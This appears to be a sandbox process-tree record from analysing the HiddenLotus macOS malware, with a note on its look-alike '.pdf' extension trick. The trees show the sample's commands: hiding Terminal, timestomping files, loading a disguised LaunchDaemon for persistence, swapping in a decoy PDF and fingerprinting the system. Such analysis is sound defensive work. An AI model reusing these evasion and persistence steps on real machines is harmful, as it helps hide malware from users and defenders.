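HiddenLotus Process Tree
Two JSON objects follow: the process tree rooted at the launched application bundle (pid 2535), then the tree rooted at the `xpcproxy com.apple.mdwork.shared` process (pid 2548). The `\u217e` in the bundle name is U+217E (small Roman numeral five hundred, "ⅾ"), not the ASCII letter "d", so the bundle's extension only looks like `.pdf`; detections that compare file extensions should flag or normalise such look-alike characters rather than assume ASCII.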
{
"process_name": "/Users/zingo123/Downloads/HiddenLotus/L\u00ea Thu H\u00e0 (HAEDC).p\u217ef/Contents/MacOS/L\u00ea Thu H\u00e0 (HAEDC)",
"pid": 2535,
"command_line_args": "./L\u00ea Thu H\u00e0 (HAEDC)",
"child_processes": [
{
"process_name": "/bin/sh",
"pid": 2536,
"command_line_args": "sh -c osascript -e 'tell application \"Finder\"' -e 'set visible of process \"Terminal\" to false' -e 'end tell' > /dev/null 2>&1",
"child_processes": [
{
"process_name": "/usr/bin/osascript",
"pid": 2537,
"command_line_args": "osascript -e tell application \"Finder\" -e set visible of process \"Terminal\" to false -e end tell"
}
]
},
{
"process_name": "/bin/sh",
"pid": 2540,
"command_line_args": "sh -c touch -t 1301230549 \"/Library/Spotlight/iWork.mdimporter/Contents/MacOS/mdwork\" >/dev/null 2>&1",
"child_processes": [
{
"process_name": "/usr/bin/touch",
"pid": 2541,
"command_line_args": "touch -t 1301230549 /Library/Spotlight/iWork.mdimporter/Contents/MacOS/mdwork"
}
]
},
{
"process_name": "/bin/sh",
"pid": 2542,
"command_line_args": "sh -c touch -t 1301230549 \"/Library/LaunchDaemons/com.apple.mdwork.shared.plist\" >/dev/null 2>&1",
"child_processes": [
{
"process_name": "/usr/bin/touch",
"pid": 2543,
"command_line_args": "touch -t 1301230549 /Library/LaunchDaemons/com.apple.mdwork.shared.plist"
}
]
},
{
"process_name": "/bin/sh",
"pid": 2544,
"command_line_args": "sh -c launchctl load /Library/LaunchDaemons/com.apple.mdwork.shared.plist > /dev/null 2>&1 &",
"child_processes": [
{
"process_name": "/bin/launchctl",
"pid": 2546,
"command_line_args": "launchctl load /Library/LaunchDaemons/com.apple.mdwork.shared.plist"
}
]
},
{
"process_name": "/bin/sh",
"pid": 2545,
"command_line_args": "sh -c mv -f \"/Users/zingo123/Downloads/HiddenLotus/L\u00ea Thu H\u00e0 (HAEDC).p\u217ef/Contents/Resources/configureDefault.sys\" \"/tmp/L\u00ea Thu H\u00e0 (HAEDC).pdf\" > /dev/null 2>&1 ; open \"/tmp/L\u00ea Thu H\u00e0 (HAEDC).pdf\" & > /dev/null 2>&1 ; rm -rf \"/Users/zingo123/Downloads/HiddenLotus/L\u00ea Thu H\u00e0 (HAEDC).p\u217ef\" > /dev/null 2>&1 ; cp -f \"/tmp/L\u00ea Thu H\u00e0 (HAEDC).pdf\" \"/Users/zingo123/Downloads/HiddenLotus/L\u00ea Thu H\u00e0 (HAEDC).pdf\" > /dev/null 2>&1 ; sleep 3 ; rm -rf \"/tmp/L\u00ea Thu H\u00e0 (HAEDC).pdf\" > /dev/null 2>&1",
"child_processes": [
{
"process_name": "/bin/mv",
"pid": 2547,
"command_line_args": "mv -f /Users/zingo123/Downloads/HiddenLotus/L\u00ea Thu H\u00e0 (HAEDC).p\u217ef/Contents/Resources/configureDefault.sys /tmp/L\u00ea Thu H\u00e0 (HAEDC).pdf"
},
{
"process_name": "/usr/bin/open",
"pid": 2549,
"command_line_args": "open /tmp/L\u00ea Thu H\u00e0 (HAEDC).pdf"
},
{
"process_name": "/bin/rm",
"pid": 2550,
"command_line_args": "rm -rf /Users/zingo123/Downloads/HiddenLotus/L\u00ea Thu H\u00e0 (HAEDC).p\u217ef"
},
{
"process_name": "/bin/cp",
"pid": 2551,
"command_line_args": "cp -f /tmp/L\u00ea Thu H\u00e0 (HAEDC).pdf /Users/zingo123/Downloads/HiddenLotus/L\u00ea Thu H\u00e0 (HAEDC).pdf"
},
{
"process_name": "/bin/sleep",
"pid": 2552,
"command_line_args": "sleep 3"
},
{
"process_name": "/bin/rm",
"pid": 2561,
"command_line_args": "rm -rf /tmp/L\u00ea Thu H\u00e0 (HAEDC).pdf"
}
]
}
]
}
{
"process_name": "/dev/console",
"pid": 2548,
"command_line_args": "xpcproxy com.apple.mdwork.shared",
"child_processes": [
{
"process_name": "/bin/sh",
"pid": 2553,
"command_line_args": "sh -c sw_vers -productVersion 2>&1",
"child_processes": [
{
"process_name": "/usr/bin/sw_vers",
"pid": 2554,
"command_line_args": "sw_vers -productVersion"
}
]
},
{
"process_name": "/bin/sh",
"pid": 2556,
"command_line_args": "sh -c uname -m 2>&1",
"child_processes": [
{
"process_name": "/usr/bin/uname",
"pid": 2557,
"command_line_args": "uname -m"
}
]
},
{
"process_name": "/bin/sh",
"pid": 2564,
"command_line_args": "sh -c sw_vers -productVersion 2>&1",
"child_processes": [
{
"process_name": "/usr/bin/sw_vers",
"pid": 2565,
"command_line_args": "sw_vers -productVersion"
}
]
},
{
"process_name": "/bin/sh",
"pid": 2566,
"command_line_args": "sh -c uname -m 2>&1",
"child_processes": [
{
"process_name": "/usr/bin/uname",
"pid": 2567,
"command_line_args": "uname -m"
}
]
},
{
"process_name": "/bin/sh",
"pid": 2568,
"command_line_args": "sh -c sw_vers -productVersion 2>&1",
"child_processes": [
{
"process_name": "/usr/bin/sw_vers",
"pid": 2569,
"command_line_args": "sw_vers -productVersion"
}
]
},
{
"process_name": "/bin/sh",
"pid": 2570,
"command_line_args": "sh -c uname -m 2>&1",
"child_processes": [
{
"process_name": "/usr/bin/uname",
"pid": 2571,
"command_line_args": "uname -m"
}
]
}
]
}